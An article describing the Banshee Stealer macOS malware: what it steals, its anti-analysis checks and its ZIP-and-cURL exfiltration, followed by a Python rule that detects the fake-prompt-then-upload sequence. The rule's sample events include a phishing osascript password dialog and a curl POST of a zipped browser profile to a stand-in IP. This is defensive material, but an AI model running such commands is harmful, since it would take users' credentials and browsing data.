Security researchers have recently discovered a new macOS malware known as Banshee Stealer, which poses a significant threat to Mac users [8].

Description

Banshee Stealer is an information stealer for macOS [3], sold in underground forums for $3,000 per month. It exfiltrates system information [3], browser data [2] [3] [4] and cryptocurrency wallet credentials [3] [5]. Targeted browsers include Safari, Chrome [1] [2] [3] [6] [7] [9], Firefox [1] [2] [3] [6] [7] [9], Brave [2] [6] [7], Edge [1] [2] [6] [7], Vivaldi [2] [6] and Opera [2] [6], along with over 100 browser extensions and cryptocurrency wallets. From the browsers it takes cookies [2] [3], saved logins [2] [3], browsing history [2] and browser plugin data [2]; from the system it takes device data [3], system and user passwords [3] [8] and credentials stored in the Keychain [3], which is how the wallet information is compromised [3]. To get the user's password it displays a fake password prompt through AppleScript [4] [7], and it collects iCloud Keychain passwords and Notes [7] [9] [10] as well.

The malware runs on both x86_64 and ARM64 [2] [7] [8] [10] and is suspected to have been written by Russian actors: it will not infect a system whose primary language is Russian, and it stays inactive inside virtual machines, so dynamic analysis in a VM-based sandbox may show no stealing behaviour at all.

The collected data is compressed into a ZIP file, encrypted [2], encoded [2] and sent with a POST request to a configured URL using the cURL command [2]. Although it lacks sophisticated obfuscation [2], Banshee Stealer is regarded as a high-quality tool for cybercriminals [6].
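The two steps above that a defender can actually observe on an endpoint are the AppleScript password prompt and the cURL upload of the ZIP. The following is an added example, not code from any of the cited write-ups, of a small correlation rule over process-execution events that flags an osascript prompt with a masked answer field followed on the same host, within a short window, by a curl POST of a .zip file. The log format, the command lines, the hostnames and the upload URL are all constructed for the example and are assumptions, not Banshee indicators; the rule generalises the described behaviour rather than matching a specific sample.

```python
"""
Added example (not code from the cited write-ups): correlate an osascript
fake password prompt with a subsequent curl upload of a ZIP archive.

Assumptions: the log format ("<ISO timestamp> <host> <command line>"),
the command lines, hostnames and the upload URL are constructed for this
example and are not real Banshee indicators.
"""
import re
from datetime import datetime, timedelta

# Constructed sample events. Only mac-01 shows the full sequence;
# mac-02 is benign osascript/curl use and mac-03 is a lone ZIP upload.
SAMPLE_EVENTS = """\
2024-08-15T10:01:02Z mac-01 /usr/bin/osascript -e 'display dialog "macOS needs your password to continue" default answer "" with hidden answer'
2024-08-15T10:01:40Z mac-01 /usr/bin/zip -r /tmp/out.zip /Users/alice/Library/Application Support/Google/Chrome/Default
2024-08-15T10:01:45Z mac-01 /usr/bin/curl -X POST -F 'file=@/tmp/out.zip' http://203.0.113.10/upload
2024-08-15T11:15:00Z mac-02 /usr/bin/osascript -e 'display notification "Build finished"'
2024-08-15T11:16:00Z mac-02 /usr/bin/curl -X POST -d 'status=ok' https://ci.example.internal/hook
2024-08-15T12:00:00Z mac-03 /usr/bin/curl -X POST -F 'file=@/tmp/report.zip' https://files.example.internal/upload
"""

EVENT_RE = re.compile(r"^(\S+)\s+(\S+)\s+(.*)$")

# "display dialog ... with hidden answer" is the AppleScript idiom for a
# masked text field, i.e. a password-style prompt from a non-system process.
FAKE_PROMPT_RE = re.compile(r"osascript.*display dialog.*with hidden answer", re.I)

# curl with a POST indicator and a .zip path: an archive upload.
ARCHIVE_POST_RE = re.compile(r"\bcurl\b.*(?:-X\s*POST|--data\b|-d\b|-F\b).*\.zip\b", re.I)


def classify(cmdline):
    """Return 'fake_prompt', 'archive_post' or None for one command line."""
    if FAKE_PROMPT_RE.search(cmdline):
        return "fake_prompt"
    if ARCHIVE_POST_RE.search(cmdline):
        return "archive_post"
    return None


def parse_events(log_text):
    """Yield (timestamp, host, cmdline) tuples from the constructed log format."""
    for line in log_text.splitlines():
        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
        yield ts, m.group(2), m.group(3)


def detect(log_text, window_seconds=600):
    """Flag hosts where an archive upload follows a fake prompt within the window."""
    window = timedelta(seconds=window_seconds)
    last_prompt = {}  # host -> timestamp of the most recent fake prompt
    alerts = []
    for ts, host, cmdline in sorted(parse_events(log_text)):
        kind = classify(cmdline)
        if kind == "fake_prompt":
            last_prompt[host] = ts
        elif kind == "archive_post" and host in last_prompt:
            if timedelta(0) <= ts - last_prompt[host] <= window:
                alerts.append({
                    "host": host,
                    "prompt_at": last_prompt[host].isoformat(),
                    "upload_at": ts.isoformat(),
                    "upload_cmd": cmdline,
                })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"[ALERT] {alert['host']}: prompt {alert['prompt_at']} -> upload {alert['upload_at']}")
        print(f"        {alert['upload_cmd']}")
```

Run against the constructed events it flags only mac-01; the lone ZIP upload on mac-03 and the benign osascript notification on mac-02 do not fire. In a real deployment the same two-step rule would be fed from an EDR's process-execution stream, and the ZIP-upload side should be widened to whatever archive and HTTP client the stealer variant at hand actually uses, since the page only states that this variant uses a ZIP and the cURL command.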

Conclusion

Users are advised to scan their systems with reputable antivirus software to detect and remove Banshee Stealer [3], and to be cautious with downloads from unknown sources and with unexpected email attachments. Because the stealer obtains the user's password through a fake AppleScript prompt, an unexpected password dialog that appears right after opening a download should be treated as suspicious and not answered. The growing targeting of macOS by cybercriminals shows that Mac users need the same level of endpoint protection as users of other platforms.

References

[1] https://www.gearrice.com/update/banshee-stealer-new-malware-targets-browsers-on-macos/
[2] https://securityaffairs.com/167138/malware/banshee-stealer-macos-malware.html
[3] https://www.bugsfighter.com/remove-banshee-stealer/
[4] https://www.heise.de/en/news/Banshee-Stealer-macOS-malware-targets-browser-data-and-crypto-wallets-9838425.html
[5] https://appleinsider.com/articles/24/08/16/banshee-stealer-malware-haunts-browser-extensions-on-macos
[6] https://forums.appleinsider.com/discussion/237321/banshee-stealer-malware-haunts-browser-extensions-on-macos
[7] https://thecybersecurity.news/general-cyber-security-news/new-banshee-stealer-targets-100-browser-extensions-on-apple-macos-systems-30515/
[8] https://securitynews.neuracyb.com/new-macos-malware-banshee-stealer-targets-over-100-browser-extensions/
[9] https://thehackernews.com/2024/08/new-banshee-stealer-targets-100-browser.html
[10] https://cybermaterial.com/new-banshee-stealer-targets-macos-browsers/